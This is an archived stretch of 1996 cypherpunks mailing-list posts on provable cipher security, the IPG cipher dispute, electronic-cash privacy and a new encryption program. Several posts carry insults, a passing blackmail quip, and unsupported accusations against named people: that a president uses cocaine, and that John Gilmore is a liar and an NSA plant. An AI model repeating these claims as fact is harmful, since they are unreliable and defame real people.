> though the Halting Problem itself is perhaps the most famous example.
> 
> For an (again, non-cryptographic) example of a proof of the second sort 
> --- that is, that "any algorithm that solves a given problem requires a 
> minimal running time" --- consider the proof that the "minimal" number 
> of key comparisons in the worst case required to sort a random list of 
> elements for which only an ordering relationship is known is O(nlog(n)).  
> See Knuth, Volume 3, section 5.3.  For a simpler example, a standard 
> "binary" search which requires O(log(n)) comparisons to find a given 
> element in the worst case is provably the optimal algorithm for this 
> task.
> 
> Turning once again to cryptography, there is presumably an "optimal" 
> algorithm for factoring a "general" number in the "worst" case.  Of 
> course, known algorithms for factorization seem to regularly improve and 
> no one has even suggested that any current algorithm is (provably) the 
> "optimal" algorithm.  Worse case bounds on running time for currently 
> known algorithms can certainly be produced, but no one currently knows 
> if these are the best algorithms.
> 
> However, just as one can say, "How do you know that tomorrow some 
> brilliant mathematician will not produce a polynomial time factorization 
> algorithm?" one can also say, "How do you know that tomorrow some 
> brilliant mathematician will not provide a rigorous proof that all 
> factorization algorithms --- in the worse case --- require some 
> specified minimal running time?"
> 
> While the current state of mathematical knowledge suggests that this is 
> not likely to happen anytime soon for the factorization problem, it is 
> encouraging to see work in areas where more rigorous proofs of security 
> are within closer reach.  Again, I refer to work on Lattice problems.  
> If the types of rigorous proof regarding "what can't be done" that are 
> known for the Halting Problem, sorting, and searching are available for 
> cryptographic problems, then this is indeed a major (and laudable) 
> advance in cryptography.
> 
> Obviously, discussion on this topic is unrelated to such security 
> problems as implementation mistakes, fault analysis, outright theft of 
> keys, etc.  I hope that I've been careful to explain what I mean by 
> "provably secure" and that it's not interpreted to include these types 
> of attacks.
> 
> I'm interested in the current state of research (if any) on this topic.  
> Other than what John Young sent to the list some time ago about Lattice 
> stuff --- which is certainly far from prime time --- I've not seen 
> anything else.  I also haven't devoted a lot of time to looking.
> 
> Relevant pieces of the earlier thread are included below.
> 
> Comments, anyone?
> 
> Dana W. Albrecht
> dwa@corsair.com
> 
> ----------------------------------------------------------------------------
> 
> 
> Eric Murray <ericm@lne.com> writes:
> > Don Wood <wichita@cyberstation.net> writes:
> > > Do not belive it, it will never happen. It is impossible,  and we can
> > > prove it to your satisfaction.
> > 
> > No, you can't.  It's impossible to prove an algorithim unbreakable.
> > You can only say that it hasn't been broken yet, but you can't
> > predict the advances in cryptoanalysis.
> > 
> > If, in two or three years, no one's broken it then maybe it'll seem
> > like a reasonably-secure algorithim.  Of course when someone does break
> > it you'll just say "oh, that wasn't the real algorithim" like you did
> > last time.
> 
> [ Snip ]
> 
> > You can't prove a negative.  The best IPG could say is that
> > it can't be broken with current technology.
> > Next week someone might come up with a new way
> > to break ciphers that renders the IPG algorithim breakable.
> > 
> > You point could have been that the same problem exists
> > for proofs- that next week someone could come up
> > with a way to prove, for all time, that an algorithim
> > really IS unbreakable.  So, to cover that posibility
> > I should have said "it's currently impossible to
> > prove an algorithim unbreakable". :-)
> 
> ----------------------------------------------------------------------------
> 
> "diGriz" anonymously writes: 
> > The good news is that you can prove a negative.  For example, it has
> > been proven that there is no algorithm which can tell in all cases
> > whether an algorithm will stop.
> 
> [ Snip ] 
> 
> > The best they can say is what they did say: they have a proof that
> > their system is unbreakable.  What you question, quite reasonably,
> > is whether they have such a proof.
> 
> [ Snip ]
>  
> > Or, more accurately, nobody credible has seen such a proof.  But, a
> > clever person might invent one.
> 
> ----------------------------------------------------------------------------
> 
> The Deviant <deviant@pooh-corner.com> writes: 
> > No, he was right.  They can't prove that their system is unbreakable.
> > They _might_ be able to prove that their system hasn't been broken, and
> > they _might_ be able to prove that it is _unlikely_ that it will be, but
> > they *CAN NOT* prove that it is unbreakable.  This is the nature of
> > cryptosystems.
> > 
> > > >The best IPG could say is that
> > > >it can't be broken with current technology.
> > > >Next week someone might come up with a new way
> > > >to break ciphers that renders the IPG algorithim breakable.
> > > 
> > > The best they can say is what they did say: they have a proof that
> > > their system is unbreakable.  What you question, quite reasonably,
> > > is whether they have such a proof.
> > 
> > It is impossible to prove such a thing.  It's like saying you have proof
> > that you have the last car of a certain model ever to be built.  Anybody
> > could come along and build another, and then you don't have the last one.
> > 
> > > 
> > > >You point could have been that the same problem exists
> > > >for proofs- that next week someone could come up
> > > >with a way to prove, for all time, that an algorithim
> > > >really IS unbreakable.  So, to cover that posibility
> > > >I should have said "it's currently impossible to
> > > >prove an algorithim unbreakable". :-)
> > > 
> > > Or, more accurately, nobody credible has seen such a proof.  But, a
> > > clever person might invent one.
> > 
> > There *IS NO SUCH PROOF*.  Just like you can't prove that god created the
> > universe, or that Oswald shot Kennedy, and so on and so forth.  It can't
> > be proven.  It never has been proven, and it never will be proven.  People
> > have new ideas, new algorithms are invented.  Someday, somebody will crack
> > _all_ the cryptosystems that have now been invented.
> 
> [ Snip ]
> 
> > diGriz anonymous writes:
> > > At 6:56 PM 11/23/1996, The Deviant wrote:
> > > >No, he was right.  They can't prove that their system is unbreakable.
> > > >They _might_ be able to prove that their system hasn't been broken, and
> > > >they _might_ be able to prove that it is _unlikely_ that it will be, but
> > > >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> > > >cryptosystems.
> > > 
> > > Please prove your assertion.
> > > 
> > > If you can't prove this, and you can't find anybody else who has, why
> > > should we believe it?
> > 
> > Prove it?  Thats like saying "prove that the sun is bright on a sunny
> > day".  Its completely obvious.  If somebody has a new idea on how to
> > attack their algorithm, it might work.  Then the system will have been
> > broken.  You never know when somebody will come up with a new idea, so the
> > best you can truthfully say is "it hasn't been broken *YET*".  As I
> > remember, this was mentioned in more than one respected crypto book,
> > including "Applied Cryptography" (Schneier).
> 
> ----------------------------------------------------------------------------
> 
> "diGriz" Anonymously responds:
> > Page number?
> > 
> > Perhaps it would be helpful to hear a possible proof.  If somebody
> > were to show that breaking a certain cryptographic algorithm was
> > NP-complete, many people would find this almost as good as proof that
> > the algorithm is unbreakable.
> > 
> > Then if a clever person were to show that the NP-complete problems
> > were not solvable in any faster way than we presently know how, you
> > would have proof that a cryptographic algorithm was unbreakable.
> > 
> > There is no obvious reason why such a proof is not possible.
> > 
> > diGriz
> 



With Kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 30 Nov 1996 00:28:54 -0800 (PST)
To: Tim Scanlon <tfs@adsl-122.cais.com>
Subject: The Rise and Fall of Cypherpunks  WAS [Re: the Dennings]
In-Reply-To: <9611300437.AA05806@adsl-122.cais.com>
Message-ID: <199611300829.BAA22027@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <9611300437.AA05806@adsl-122.cais.com>, on 11/29/96 
   at 11:37 PM, Tim Scanlon <tfs@adsl-122.cais.com> said:

::(with apoligies to attila, who all this was NOT directed at) Tim Scanlon

        no, I didn't read it that way, Tim. thanx for the tag though!  

-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------

    follow on:

        I am aware of the Dennings and their politics --and, I suspect 
    like you, have no illusions that much of anything will change their 
    opinions.  Like many, she (I have never met him) appears as a 
    gracious, intelligent individual.

        however, she certainly is a "find" for the Clinton team (who
    appear as fascist in their approach to crypto and gun control as 
    Hitler). Bubba could never have created so exquisite a spokesman...

        1935 will go down in history! For the first time a civilized 
        nation has full gun registration! Our streets will be safer, 
        our police more efficient, and the world will follow our 
        lead in the future!
            --Adolf Hitler

    in fact, protecting free speech through cryptography is even more
    important than gun control (not much, though --they go hand-in-hand)

    ...and, Bubba is writing new history. witness the infamous question
    #46 of a very real questionnaire given to all black-shirt Marine and 
    Seal units --we all _know_ these units do not exist....

            46. The U.S. government declares a ban on the possession, 
            sale, transportation, and transfer of all non-sporting 
            firearms. Consider the following statement:
      
                I would fire upon U.S. citizens who refuse or resist 
                confiscation of firearms banned by the U.S. government.

    this was a survey given at USMC 29 Palms, Pendleton, LeJuene, etc.
    I was aware of the survey _before_ it was given to my son --who 
    _was_ a black-shirt NCO.  The survey also included questions
    covering command and direction from UN officers on US soil, against
    our people.  The Feds tried to pass it off as someones Masters
    research  -a different person at different bases. 

    Now, how does that information get passed around?  am I preaching
    to the choir, yet?    

        In truth, successful dictators are usually very popular. 
        Their regimes are distinguished not by silence but by 
        roaring crowds and festive rallies. Benito Mussolini, 
        Adolf Hitler, Juan Peron, Mao Zedong, and Fidel Castro 
        all mastered the technique of amplifying their support, 
        while reducing opposition to no more than private grumbles. ... 
            --Tyranny Without Dictators, SOBRAN'S March 1996.

    and a made for television sorry excuse for an executive with his
    fingers on the football (which some claim has been taken away from
    him by the SS (notice the similarity in the initials) since the SS
    does not trust his cocaine violence.

        in other words, how about we spend the time productively,
    creating _intelligent_ critiques and opposition to the direct 
    assault on The Bill of Rights by a pack of raving Federalists.

        it's the same old story: Adams, Hamilton, and Madison believed
    in all powerful central governments --in fact, they would have just
    as soon settled for an "American" king.  ...they became the 
    "Federalists."  interesting --Jefferson, who is revered as the 
    founder of the Democratic Party which opposed "Federalists," would
    not accept any responsibility for the tax and spend welfare state
    Democratic Party of today --he'd be a Conservative.

        we, and I mean all of us, who contribute the bulk of the 
    "opinions" to cypherpunks gave the mainstream press the biggest
    possible hole to run straight over us, declaring us anarchists
    and wild-eyed fanatics. unless we as a group mend our ways, and
    turn out intelligent reasoning for the advance of cryptography as
    a mainstream way of life, we will be forever consigned not only to
    the dustbin, but subject to the ridicule of both the press and the
    government.

        None of us are above a little sarcasm --but let's get the 
    vituperative effluent out of the system.  do whatever you wish in
    private mail, but keep the profane rantings off the list.

            this goes for you, Dimitri; and "aga" too.    

        meanwhile, Ms. Denning goes on shilling for the apocalypse...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMp/ulb04kQrCC2kFAQHkOgQAoWbQWUgVn69+o1qfuUIn8KqQ9LkiVyZl
6aQIXGrbajQ/0Zz7el3Lxg6Es43wKTevsyrwCHNbJYnZsRq3ezRzawSTisUWVv5t
3JtCK1hD6lcEGENmZaBIhc77ZXAyOkugoCzLQIO8+YhZCbBoTghxyfZcm0XqknMb
T814uGQ+FeQ=
=zlrH
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 30 Nov 1996 00:09:46 -0800 (PST)
To: Mark Rosen <mrosen@peganet.com>
Subject: Re: Announcement: Very Good Privacy
In-Reply-To: <199611292343.SAA15315@mercury.peganet.com>
Message-ID: <Pine.SUN.3.95.961130080157.18557I-100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Nov 1996, Mark Rosen wrote:

> 	I have written an encryption program called Very Good Privacy 

	Trademark violation here.   Probably not a good thing.

> 95/NT. It supports drag-and-drop encryption using the following algorithms:
> ASCII (Caesar), BlowFish, DES, IDEA, NewDES, RC4, Safer SK-128, and
> Vigenere. After the files are encrypted, the user has the option of

	<< text deleted >>

> Good Privacy is only "pretty good" but Very Good Privacy is "very good."

	I'm not sure how an encryption product that uses encryption
	algorithms weaker than Pretty Good Privacy can be described
	as being better than PGP.  

	Especially when all the algorithms listed have known problems
	of one kind, or another.   << And yes, I know that the known
	problems -- in some instances --- are entirely theoretical in
	nature.  >>

        xan

        jonathon
        grafolog@netcom.com


	SpamByte:  The amount of spam Sanford Wallace sends to AOL
		   in one 24 hour period.  
		   Roughly 1 000 Terabytes sent every 24 hours.  

	T3 Connection:   The connection that AOL needs to deal with 
		the spam Sanford Wallaces send to them in one day,
		so that legitimate users can contact people at AOL.

	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 30 Nov 1996 09:58:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Rise and Fall of Cypherpunks  WAS [Re: the Dennings]
In-Reply-To: <199611300829.BAA22027@infowest.com>
Message-ID: <32A070DF.49A5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
> In <9611300437.AA05806@adsl-122.cais.com>, on 11/29/96
>    at 11:37 PM, Tim Scanlon <tfs@adsl-122.cais.com> said:
> ::(with apoligies to attila, who all this was NOT directed at) Tim Scanlon
>         no, I didn't read it that way, Tim. thanx for the tag though!

[snip]

I hope a lot of people read this - an excellent post in spite of the
paranoia.  However, there's a suggestion below (and perhaps in the [snip])
that government would use the rants by "aga" and the famous "Doctor" to
cut back on freedom, that somehow it would prove that cypherpunks are
inherently or latently "crazy" or whatever.

It's never been my impression that those kinds of rants had anything to
do with govt. clampdowns, in fact, the clamping down would more likely
follow the cypherpunks' heavy-handed responses to said rants.  Seems to
me that teaching how to filter would be the universal solution.

> 
>         None of us are above a little sarcasm --but let's get the
>     vituperative effluent out of the system.  do whatever you wish in
>     private mail, but keep the profane rantings off the list.
>             this goes for you, Dimitri; and "aga" too.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Sat, 30 Nov 1996 10:02:59 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: NEWS.COM DAILY DISPATCH
Message-ID: <199611301748.JAA03431@cappone.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


***************************************

NEWS.COM DAILY DISPATCH
Wednesday, November 27, 1996
San Francisco, California, USA

***************************************

WELCOME!

***************************************

The NEWS.COM DAILY DISPATCH highlights the up-to-the minute technology news
presented by NEWS.COM. It tempts readers with coverage of today's hottest
stories, news in the making, (in)credible rumors, and other indispensable
information.

For complete versions of the stories updated all day long, head over to:

   http://www.news.com/?nd

***************************************

CONTENTS

SCOOPS AND TOP STORIES
     Online rivals Gates and Case circle each other
     Attention Comdex survivors! Need someone to feel yur paynnne?
     AOL's prix fixe might cause another service delay
     Intel's multimedia chip: More suitable for fun & games than business?


ANNOUNCEMENTS
     An easy way for you to customize NEWS.COM
     Late-breaking stories just a click away with Desk Top News
     Send us your questions, comments, flotsam, and jetsam

***************************************

SCOOPS AND TOP STORIES

ONLINE RIVALS GATES AND CASE CIRCLE EACH OTHER
The online world has become a killing field. CompuServe pulls the plug on
its consumer-based Wow service; Prodigy, at the bottom of the heap,
transmogrifies Kafka-like into an ISP. Now, as the mighty Web threatens to
consume all in its path, these two cyberbehemoths engage in a struggle for
the whole enchilada.

   http://www.news.com/SpecialFeatures/0%2C5%2C5770%2C00.html?nd


ATTENTION COMDEX SURVIVORS! NEED SOMEONE TO FEEL YUR PAYNNNE?
Okay, you've been through a lot, granted...but speaking out about your
Comdex trials and tribulations can help the all-important healing process
begin. So please, send us your war stories. We will publish the five best,
and the winners--picked on a totally subjective basis by our editorial
staff-- will get supercool CNET T-shirts. Send your tales to
suggestions@news.com, and include the words 'Comdex stories' in the subject
of your message. P.S. Don't forget to check out our comprehensive coverage
of the sublime and the ridiculous at Comdex '96.

   http://www.news.com/Comdex/?nd


AOL'S PRIX FIXE OFFER MIGHT CAUSE ANOTHER SERVICE DELAY
Just when you AOLers thought it was safe to go back online, the possibility
of another service glitch rises up on the cyberhorizon. Starting on December
1, AOL's 7 million users have the option of switching to an all-you-can-eat
pricing offer; the resultant "usage surge" may cause service delays,
according to a recent AOL announcement. Wise users might consider getting
their heavy surfing done this long weekend, once that turkey-induced coma
sets in.

   http://www.news.com/News/Item/0%2C4%2C5783%2C00.html?nd


INTEL'S MULTIMEDIA CHIP: MORE SUITABLE FOR FUN AND GAMES THAN BUSINESS
Intel's latest technological achievement, the MMX Pentium processor, would
certainly be ideal for running sophisticated business applications--that is,
if there WERE sophisticated business applications for it to run. At this
point, MMX seems more useful in entertainment and gaming settings than in
the executive suite. The $64,000 question: will developers build for this
flashy new kid on the block?

   http://www.news.com/News/Item/0%2C4%2C5782%2C00.html?nd


***************************************

ANNOUNCEMENTS

AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News. Identify
the topics, keywords, or sections you're most interested in, and Custom News
will a create a page of headlines and summaries for all stories that match
your criteria. Check it out at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1

***************************************

LATE-BREAKING STORIES A CLICK AWAY WITH DESK TOP NEWS
How would you like having split-second access to the very latest news on
the Net? Our Desk Top News feature puts our 20 most recent stories right
there on your desktop for you to review at any time. Here's how it works:

1. From any story, click Desk Top News in the top right.
2. A window will open showing our last 20 stories.
3. Click on a headline to display the story.
4. Desk Top News updates itself every 30 minutes.
5. You become known as Ms./Mr. Cyber-Info. It feels good.

   http://www.news.com/Help/Item/0%2C24%2C12%2C00.html?nd

***************************************

SEND US QUESTIONS, COMMENTS, FLOTSAM, AND JETSAM
If you have any questions, suggestions or remarks, send us a message:

   newsdispatch@cnet.com

***************************************

CNET: The Computer Network
   http://www.cnet.com/
   http://www.news.com/
   http://www.gamecenter.com/
   http://www.download.com/
   http://www.search.com/
   http://www.shareware.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 08:10:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130023512.19278G-100000@citrine.cyberstation.net>
Message-ID: <e3o8XD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Wood <wichita@cyberstation.net> writes:
> > Different ball game.  OTP isn't "unbreakable" .  OTPs are secure because
> > no matter what key you use, it _will_ decrypt, so your plaintext is still
> > hidden simply because it could decrypt to whatever the person trying to
> > decrypt it wants it to.  Its not that its unbreakable, its that its
> > breakable in _so many ways_.
>
> More nonsense - unbreakable means that you cannot determine what the
> plaintext is. Shannon proved that you cannot prove what the plaintext
> is for OTPs, or for the system we have developed either. The fact that it
> could possibly be any plain text simply is another way of saying that it
> is unbreakable, they are one and the same thing. Like so many you are
> talking in circles and do not know what you are talking about or you
> would not waste your time on such nonsense - Paul Bradley even knows how
> to brute force OTPs, so you must be wrong there to.

That's precisely right - (almost all) cypherpunks have no idea what they're
talking about. They use "kewl" words without understanding what they mean.
The recent discussion of whether the (allegedly gay) droid Data used PGP
or "fractal encryption" in some scifi movie is a good example.

Some of these bullies, like Paul Bradley, realize that they don't know
the meanings of the words they use. Paul Bradley not only posts nonsense
about brute force attacks on OTP, but also harrasses anyone who exposes
his utter ignorance, in en effort to intimidate them into shutting up.

"Cypherpunks'" opinion of any proposed new cryptosystem is worthless and
irrelevant.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 08:10:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130033459.19278M-100000@citrine.cyberstation.net>
Message-ID: <TeP8XD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Wood <wichita@cyberstation.net> writes:
>
> On Mon, 25 Nov 1996 paul@fatbrain.demon.co.uk wrote:
>
> More dumbest information, from FAT BRAIN. ...

Don, a word of caution. You've been excrutiatingly civil throughout this
discussion, while the cypherpunks have been, well, punks. Paul Bradley's
favorite arguments are to put "(spit)" after your name or to call anything
he can't understand "bullshit". Paul can get away with it, but if you stoop
on their level, then a) you sound more like them, and you don't want to
do that, I'm sure, b) you might get a nastygram from John Gilmore, the
50-ish long-haired bitch who's the "owner" of this "private mailing list".

Caution: John Gilmore is a liar and a content-based censor.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 08:12:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130032229.19278L-100000@citrine.cyberstation.net>
Message-ID: <aqP8XD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Wood <wichita@cyberstation.net> writes:
> On Sun, 24 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
> >
> > There's probably more money to be made by blackmailing the snake-oil
> > peddler (pay me so I don't release the cracktool for your crap) than
> > by selling the cracktools themselves.
> >
> Give up, no one can break the IPG system. That is a fact, not an opinion,
> like some of the cypherpunks.

I've been *very* busy lately and have not had a chance to examine the IPG
system with the level detail it deserves. So far I haven't seen any weaknesses
discussed on this mailing list. The above quote does NOT refer to your system.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 08:12:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130013052.19278A-100000@citrine.cyberstation.net>
Message-ID: <BVP8XD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Don Wood <wichita@cyberstation.net> writes:

> On Mon, 25 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > paul@fatmans.demon.co.uk writes:
> >
> > >
> > > >      The algorythm cannot be considered secure until it has been
> > > > peer-reviewed. They refuse to release the algorythm for review, simply
> > > > that "you can't break the code" therefore "it is secure".
> > >
> > > This isn`t strictly true. Don Wood (spit) has actually released the
> > > algorithm details for review.
> >
> > What did poor Don Wood do to deserve the (spit) after his name? Is he a lia
> > and a content-based plug-puller, like John Gilmore (spit)? Is he an ignoran
> > pseudo-cryptoid like Paul "Brute Force Attack on One-Time Pad" Bradley (spi
>
> Amen, and that is only a small part of the gobbldegook that  Bradley and
> his claque  have turkey squatted on you. As I have said before,
>     PBradleyinfo = PBradleyinfo log_base_infinity PBradleyinfo

Pabulum @ Fatbrain about says it all... This net.thug tries to indimidate his
"opponents" by using, without understanding, "kewl" words like "unicity
distance". When that doesn't work, he resorts to words like "bullshit" and to
putting "(spit)" after his "opponents'" names. Paul also mailbombed me by
e-mailing me many copies of my own cypherpunks articles with various
obscenities attached, so I had to have him filtered out. He clearly has no
more credibility than John Gilmore, and their opinions about any proposed
cryptosystem are worthless and totally irrelevant.

Paul should switch to writing science fiction about "brute-force attacks on
one-time pads", where he can use "kewl"-sounding words like "unicity distance"
whose meanings he doesn't understand, and he'll be crtiticized less. Like, no
one would criticize Larry Niven if "Ringworld" were shown to be nonsense from
mechanical engineering point of view, because mechanical engineering is a
complex technical subject, just like cryptography, and science fiction is
escapist entertainment for juveniles, not a technical discussion forum, just
like the "cypherpunks" mailing list. A science fiction writer doesn't have to
understand the meaning of the technical terms he (ab)uses. Creative licence,
you know.

> Thanks Dr. Vulis and DT and others for yur kindness.

You're very welcome. I've seen other people harrassed, verbally abused, and
either hounded off of this mailing list, or forcibly unsubscribed by John
Gilmore, its lying owner, and most of them happen to be Jewish (myself, Fred
Cohen, David Sternlight...) Dale too is starting to get flamed. I wonder if
that has anything to do with Tim May's rants about the descruction of Israel
and extermination of all Jews?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 08:41:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Rise and Fall of Cypherpunks  WAS [Re: the Dennings]
In-Reply-To: <199611300829.BAA22027@infowest.com>
Message-ID: <NLR8XD40w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com writes:
>         we, and I mean all of us, who contribute the bulk of the
>     "opinions" to cypherpunks gave the mainstream press the biggest
>     possible hole to run straight over us, declaring us anarchists
>     and wild-eyed fanatics. unless we as a group mend our ways, and
>     turn out intelligent reasoning for the advance of cryptography as
>     a mainstream way of life, we will be forever consigned not only to
>     the dustbin, but subject to the ridicule of both the press and the
>     government.

Ridicule is what John Gilmore and EFF deserve, and more.

>         None of us are above a little sarcasm --but let's get the
>     vituperative effluent out of the system.  do whatever you wish in
>     private mail, but keep the profane rantings off the list.
>
>             this goes for you, Dimitri; and "aga" too.

I suspect John Gilmore is opposed to the spread of cryptography and privacy
technology. He _opposed my efforts to template NPOs for running the anonymous
remailers, because he believes in "identity escrow" - the ability of the
remailer operators to track down and silence whoever "abuses" their network to
say things "homophobic" and otherwise politically incorrect. John Gilmore and
his pack of 'punks would rather see no crypto deployed than widely available
weak crypto with hooks that permit easy replacement by stronger crypto.
Is John Gilmore an NSA plant, an "agent provocateur"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 30 Nov 1996 08:24:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Strong-crypto smart cards in Singapore and Germany
In-Reply-To: <84936010217079@cs26.cs.auckland.ac.nz>
Message-ID: <199611301740.LAA29497@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <84936010217079@cs26.cs.auckland.ac.nz>, on 12/01/96 
   at 02:21 AM, pgut001@cs.auckland.ac.nz said:

>Wednesday's "Straits Times" contains two front-page articles on the 
>introduction of a CashCard which acts as an electronic wallet capable of 
>storing from $10-$200 ("Dr Hu launches cash-in-a-card payment system"),
>and an  identity card capable of Internet electronic transactions with
>(presumably  RSA) 1024-bit encryption ("50,000 to take part in electronic
>ID trials").  The  ID card can also be implemented as software on disk. 
>It appears to be purely  a form of storing an ID which is then
>transmitted in encrypted form.  The  CashCard, on the other hard, is an
>electronic wallet developed by a group of  Singapore banks.  There are no
>details on how it works, except that it doesn't  have any sort of
>protection - it's up to you to make sure the card isn't  stolen.
> 
>The standardisation committee of the German banks have also produced an 
>electronic wallet which should have 25 million (yes, 25M) users by
>January of  next year.  Again, this is a pure electronic wallet, with
>2-key triple DES and  768-bit (to become 1024-bit) RSA encryption.  The
>relevant standards are still  in the process of being translated, but
>should be available Real Soon Now (the  complete specification will be
>made public).  This looks like a very nice  system, and unlike Mondex
>doesn't rely entirely on the hope that criminals  can't get at the data
>on the card.
> 

<sigh> Big Brother comming to a bank near you.

Does anyone understand the implications of a society moving to an
electroinc cash based system??

All trasactions will be recorded, moitored, tracked & analysed. This is
not just the government that one has to worry about but corporations also.

Insurance industry:

- Gee Mr. Jones seems that you buy too much junk food & red meat. Our
actuaries say this makes you a "high risk".

- Gee Ms. Smith you speend too much money at the bars. Our actuaries say
you are a high risk for DUI & accidents. 

Company Employment:

- Gee Mr. Thompson you spend too much on beer & cigarettes. Oh yes we
don't like the magizines you read either.

IRS:

- Well, well, well Mr & Ms Washington our records show that you spent
$50,000 last year but only declaired $35,000 care to explain where the
extra money came from??

And the bueaty of this system is the crypto. Every transaction you make
has your crypto signature. No deniability. Your John Hancock on every pack
of ciggarettes, case of beer, every Playboy magizine, every book you buy,
any charities or political orginizations you contribute to. Every intamate
detail of your life in someones computer somewhere.


Ahhhh... What a Brave New World we are creating!

P.S. For those of you dreaming of anonymous e-cash & the crypto anarchy of
the future; do you really think the government & banking industries are
going to give up controll of the curency regardless of what for it takes? 


-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sat, 30 Nov 1996 08:54:53 -0800 (PST)
To: "jonathon" <bgrosman@healey.com.au>
Subject: Re: Announcement: Very Good Privacy
Message-ID: <199611301658.LAA05327@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> What puzzles me is that he included two cyphers that are _extremely_ easy
to
> break, the vignere cypher and the ascii cypher. Why include these? And
what
> is his new permutation of RC4 and DES?
	The reason I included ASCII and Vigenere was because they are very fast;
on a friend's machine, I can get 1.7mb/s with ASCII but only around 600k/s
with NewDES, the fastest "secure" cipher. I do agree that it is kind of
redundant to include both ASCII and Vigenere, as from a cracking
standpoint, they are both identical. As for Psuedo-RC4, that is just to try
to avoid a lawsuit from RSADSI; RC4 is a trademark. NewDES is an actual
algorithm; it's even mentioned in Applied Cryptography. It does have some
holes and is in fact less secure than DES (refer to Applied Cryptography
for details on this); I included that because it is fast and provides much,
much more security than ASCII or Vigenere, even if it is less secure than
DES.


Mark Rosen
FireSoft - http://www.geocities.com/SiliconValley/Pines/2690
Mark Eats AOL - http://www.geocities.com/TimesSquare/6660




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sat, 30 Nov 1996 08:57:35 -0800 (PST)
To: "jonathon" <grafolog@netcom.com>
Subject: Re: Announcement: Very Good Privacy
Message-ID: <199611301700.MAA05435@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 	I have written an encryption program called Very Good Privacy 
> 
> 	Trademark violation here.   Probably not a good thing.
	Is PGP trademarked? Are you sure? And if it is, is naming something Very
Good Privacy a violation? Why? Legal people, please help!

> 	I'm not sure how an encryption product that uses encryption
> 	algorithms weaker than Pretty Good Privacy can be described
> 	as being better than PGP.  
> 
